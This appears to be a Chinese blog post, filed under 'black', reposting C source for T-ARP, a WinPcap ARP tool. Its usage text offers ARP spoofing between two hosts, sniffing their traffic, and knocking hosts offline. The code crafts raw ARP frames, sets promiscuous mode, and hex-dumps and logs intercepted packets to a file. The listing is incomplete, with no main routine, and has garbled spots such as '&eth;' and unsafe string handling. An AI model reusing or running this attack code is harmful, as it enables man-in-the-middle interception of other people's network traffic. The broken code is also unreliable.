posts - 18,comments - 11,trackbacks - 0

五) T-ARP源代码

#include <packet32.h>
#include <ntddndis.h>
#include <stdio.h>
#include <conio.h>

#pragma comment(lib,"ws2_32")
#pragma comment(lib,"packet")

#define ETH_IP       0x0800
#define ETH_ARP      0x0806
#define ARP_REQUEST  0x0001
#define ARP_REPLY    0x0002
#define ARP_HARDWARE 0x0001
#define max_num_adapter  10

#pragma pack(push,1)

typedef struct ethdr
{
    unsigned char   eh_dst[6];
    unsigned char   eh_src[6];
    unsigned short  eh_type;
}ETHDR,*PETHDR;

typedef struct arphdr
{
    unsigned short  arp_hdr;
    unsigned short  arp_pro;
    unsigned char   arp_hln;
    unsigned char   arp_pln;
    unsigned short  arp_opt;
    unsigned char   arp_sha[6];
    unsigned long   arp_spa;
    unsigned char   arp_tha[6];
    unsigned long   arp_tpa;
}ARPHDR,*PARPHDR;

typedef struct iphdr
{
    unsigned char  h_lenver;
    unsigned char  tos;
    unsigned short total_len;
    unsigned short ident;
    unsigned short frag_and_flags;
    unsigned char  ttl;
    unsigned char  proto;
    unsigned short checksum;
    unsigned int   sourceip;
    unsigned int   destip;
}IPHDR,*PIPHDR;

#pragma pack(push)

LPADAPTER lpadapter=0;
LPPACKET  lppacketr,lppackets;
ULONG     myip,firstip,secondip;
UCHAR     mmac[6]={0},fmac[6]={0},smac[6]={0};
BOOL      mm=FALSE,fm=FALSE,sm=FALSE;
FILE      *fp;
char      adapterlist[max_num_adapter][1024];
char      msg[50];
int       num=0;

void start()
{
    printf("T-ARP --- ARP Tools, by TOo2y(ò1é?), 11-9-2002\n");
    printf("Homepage: www.safechina.net\n");
    printf("E-mail: TOo2y@safechina.net\n");
    return ;
}

void usage()
{
    printf("\nUsage: T-ARP  [-m|-a|-s|-r]  firstip  secondip  \n\n");
    printf("Option:\n");
    printf("   -m  mac        Get the mac address from firstip to secondip\n");
    printf("   -a  antisniff  Get the sniffing host from firstip to secondip\n");
    printf("   -s  spoof      1> Spoof the host between firstip and secondip\n");
    printf("       sniff      2> Sniff if firstip == secondip == your own ip\n");
    printf("       shock      3> Shock if firstip == secondip != your own ip\n");
    printf("   -r  reset      Reset the spoofed host work normally\n\n");
    printf("Attention:\n");
    printf("    1> You must have installed the winpcap_2.3 or winpcap_3.0_alpha\n");
    printf("    2> HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\IPEnableRouter==0x1\n\n");
    return ;
}

int getmine()
{
    char   sendbuf[1024];
    int    k;
    ETHDR  eth;
    ARPHDR arp;

    for(k=0;k<6;k++)
    {
        eth.eh_dst[k]=0xff;
        eth.eh_src[k]=0x82;
        arp.arp_sha[k]=0x82;
        arp.arp_tha[k]=0x00;
    }
    eth.eh_type=htons(ETH_ARP);
    arp.arp_hdr=htons(ARP_HARDWARE);
    arp.arp_pro=htons(ETH_IP);
    arp.arp_hln=6;
    arp.arp_pln=4;
    arp.arp_opt=htons(ARP_REQUEST);
    arp.arp_tpa=htonl(myip);
    arp.arp_spa=inet_addr("112.112.112.112");

    memset(sendbuf,0,sizeof(sendbuf));
    memcpy(sendbuf,&eth;,sizeof(eth));
    memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));

    PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));
    if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE)
    {
        printf("PacketSendPacket in getmine Error: %d\n",GetLastError());
        return -1;            
    }
    return 0;
}

void getdata(LPPACKET lp,int op)
{
    ULONG  ulbytesreceived,off,tlen,ulen,ulLines;
    ULONG  j,k;
    ETHDR  *eth;
    ARPHDR *arp;
    PIPHDR ip;
    char   *buf,*pChar,*pLine,*base;
    struct bpf_hdr      *hdr;
    struct sockaddr_in  sin;


    ulbytesreceived=lp->ulBytesReceived;
    buf=(char *)lp->Buffer;

    off=0;
    while(off<ulbytesreceived)
    {
        if(kbhit())
        {
            return ;
        }
        hdr=(struct bpf_hdr *)(buf+off);
        off+=hdr->bh_hdrlen;

        pChar=(char *)(buf+off);
        base=pChar;
        off=Packet_WORDALIGN(off+hdr->bh_caplen);

        eth=(PETHDR)pChar;               
        arp=(PARPHDR)(pChar+sizeof(ETHDR));

        if(eth->eh_type==htons(ETH_IP))
        {
                    ip=(PIPHDR)(pChar+sizeof(ETHDR));

            if(fm && sm && (op==3)) 
            { 
                if((((ip->sourceip!=htonl(myip)) && (ip->destip!=htonl(myip))
                                && !strcmp((char *)eth->eh_dst,(char *)mmac))
                && ((ip->sourceip==htonl(firstip)) || (ip->destip==htonl(firstip))
                || (ip->sourceip==htonl(secondip)) || (ip->destip==htonl(secondip))))
                                || ((firstip==myip) && (secondip==myip)))
                {
                    memset(msg,0,sizeof(msg));

                    sin.sin_addr.s_addr=ip->sourceip;               
                    printf("[IP:]%16s ---> [IP:]",inet_ntoa(sin.sin_addr));

                                        strcpy(msg,inet_ntoa(sin.sin_addr));
                    strcat(msg+15," ---> ");

                    sin.sin_addr.s_addr=ip->destip;
                    printf("%16s\n",inet_ntoa(sin.sin_addr));
                  
                    strcat(msg+23,inet_ntoa(sin.sin_addr));
                    fseek(fp,-2,1);
                    fwrite("\r\n\r\n\r\n",6,1,fp);
                    fwrite(msg,38,1,fp);
                    fwrite("\r\n",2,1,fp);

                    ulLines=(hdr->bh_caplen+15)/16;
                    for(k=0;k<ulLines;k++)
                    {
                        pLine=pChar;
                        printf("%08lx : ",pChar-base);

                        ulen=tlen;
                        ulen=(ulen>16) ? 16 : ulen;
                        tlen-=ulen;

                        for(j=0;j<ulen;j++)
                            printf("%02x ",*(BYTE *)pChar++);

                        if(ulen<16)
                            printf("%*s",(16-ulen)*3," ");

                        pChar=pLine;

                        for(j=0;j<ulen;j++,pChar++)
                        {
                            printf("%c",isprint(*pChar)? *pChar : '.');
                            fputc(isprint(*pChar) ? *pChar : '.',fp);
                        }
                        printf("\n");
                    }
                    printf("\n");
                                        fwrite("\r\n",2,1,fp); 
                }

            }
            continue;
        }
                else if((eth->eh_type==htons(ETH_ARP)) && (arp->arp_opt==htons(ARP_REPLY))) 
        {
            sin.sin_addr.s_addr=arp->arp_spa;

             if(sin.sin_addr.s_addr==htonl(myip))
        {
            memcpy(mmac,eth->eh_src,6);
        if(!mm)
             {
            printf("\t");   
                     for(k=0;k<5;k++)
                        printf("%.2x-",eth->eh_src[k]);
                  printf("%.2x\n",eth->eh_src[5]);

                    switch(op)
            {
                    case 1:
                         printf("\n[MAC LIST:]");
                        break;
                     case 2:
                        printf("\n[Sniffing Host:]");    
                         break;
                      default:                   
                         break;
            }
        }
            mm=TRUE;
        }

             if((op==1) || (op==2))
            {
                printf("\n[IP:] %.16s  [MAC:] ",inet_ntoa(sin.sin_addr));
                for(k=0;k<5;k++)
                    printf("%.2x-",eth->eh_src[k]);
                printf("%.2x",eth->eh_src[5]);
        }
               else if(((op==3) || (op==4)) && (!fm || !sm))
        {
                if(arp->arp_spa==htonl(firstip))
            {
                    memcpy(fmac,eth->eh_src,6);
                    fm=TRUE;
            }
               
            if(arp->arp_spa==htonl(secondip))
            {
                    memcpy(smac,eth->eh_src,6);
                    sm=TRUE;
            }
        }
    }
    }
    return ;
}
           
DWORD WINAPI sniff(LPVOID no)
{
    int      option=*(int *)no;
    char     recvbuf[1024*250];

    if(PacketSetHwFilter(lpadapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE)
    {
        printf("Warning: Unable to set the adapter to promiscuous mode\n");
    }

    if(PacketSetBuff(lpadapter,500*1024)==FALSE)
    {
        printf("PacketSetBuff Error: %d\n",GetLastError());
        return -1;
    }

    if(PacketSetReadTimeout(lpadapter,1)==FALSE)
    {
        printf("Warning: Unable to set the timeout\n");
    }

    if((lppacketr=PacketAllocatePacket())==FALSE)
    {
        printf("PacketAllocatePacket receive Error: %d\n",GetLastError());
        return -1;
    }

    PacketInitPacket(lppacketr,(char *)recvbuf,sizeof(recvbuf));

    while(!kbhit())
    {
        if(PacketReceivePacket(lpadapter,lppacketr,TRUE)==FALSE)
        {
            if(GetLastError()==6)
                return 0;
                        printf("PacketReceivePacket Error: %d\n",GetLastError());
                    return -1;
        }
        getdata(lppacketr,option);
    }
    return 0;
}

DWORD WINAPI sendMASR(LPVOID no)
{
    int    fun=*(int *)no;
    int    k,stimes;
        char   sendbuf[1024];
    ETHDR  eth;
    ARPHDR arp;

    if(fun<1 || fun>4)
    {
        return -1;
    }
    else
    {
        for(k=0;k<6;k++)
        {
            eth.eh_dst[k]=0xff;
            arp.arp_tha[k]=0x00;
        }
        if(fun==2)
            eth.eh_dst[5]=0xfe;
    }

    memcpy(eth.eh_src,mmac,6);
    eth.eh_type=htons(ETH_ARP);

    arp.arp_hdr=htons(ARP_HARDWARE);
    arp.arp_pro=htons(ETH_IP);
    arp.arp_hln=6;
    arp.arp_pln=4;
    arp.arp_opt=htons(ARP_REQUEST);
    arp.arp_spa=htonl(myip);
    memcpy(arp.arp_sha,mmac,6);

    if(fun==1 || fun==2)
        stimes=1;
    else if(fun==3 || fun==4)
        stimes=2;

    for(k=0;k<stimes;k++)
    {
        if(stimes==1)
        {
            arp.arp_tpa=htonl(firstip+(num++));
        }
        else if(stimes==2)
        {
            switch(k)
            {
            case 0:
                arp.arp_tpa=htonl(firstip);
                break;
            case 1:
                arp.arp_tpa=htonl(secondip);
                break;
            default:
                break;
            }
        }

        memset(sendbuf,0,sizeof(sendbuf));
        memcpy(sendbuf,&eth;,sizeof(eth));
        memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));

        PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));
        if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE)
        {
            printf("PacketSendPacket in sendMASR Error: %d\n",GetLastError());
            return -1;
        }
    }
    return 0;
}

posted on 2009-03-10 08:06 冰火 阅读(411) 评论(0)  编辑 收藏 引用 所属分类: black

只有注册用户登录后才能发表评论。
网站导航: 博客园   IT新闻   BlogJava   知识库   博问   管理